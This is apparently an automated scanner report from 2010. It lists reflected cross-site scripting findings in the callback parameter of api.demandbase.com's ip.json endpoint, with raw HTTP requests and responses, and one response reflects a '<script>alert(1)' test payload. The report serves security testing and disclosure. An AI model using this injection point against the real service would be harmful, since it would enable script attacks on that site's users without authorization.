1. Cross-site scripting (reflected)
1.1. http://api.demandbase.com/api/v2/ip.json [callback parameter]
1.2. http://api.demandbase.com/api/v2/ip.json [callback parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://api.demandbase.com |
Path: | /api/v2/ip.json |
GET /api/v2/ip.json?token Host: api.demandbase.com Proxy-Connection: keep-alive Referer: http://volumelicensing Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Api-Version: v2 Content-Type: application/javascript Date: Fri, 12 Nov 2010 03:06:58 GMT Server: Apache Status: 200 Vary: Accept-Encoding X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Connection: keep-alive Content-Length: 251 8dc66<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.demandbase.com |
Path: | /api/v2/ip.json |
GET /api/v2/ip.json?token Host: api.demandbase.com Proxy-Connection: keep-alive Referer: http://volumelicensing Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Api-Version: v2 Content-Type: application/javascript Date: Fri, 12 Nov 2010 03:06:56 GMT Server: Apache Status: 200 Vary: Accept-Encoding X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Connection: keep-alive Content-Length: 282 lpOpenPlatformNS ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://api.demandbase.com |
Path: | /api/v2/ip.json |
GET /api/v2/ip.json?token=e7eb903cdfccaf78beac Host: api.demandbase.com Proxy-Connection: keep-alive Referer: http://volumelicensing Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Api-Version: v2 Content-Type: application/javascript Date: Fri, 12 Nov 2010 03:06:10 GMT Server: Apache Status: 200 Vary: Accept-Encoding X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.15 Connection: keep-alive Content-Length: 255 lpOpenPlatformNS ...[SNIP]... |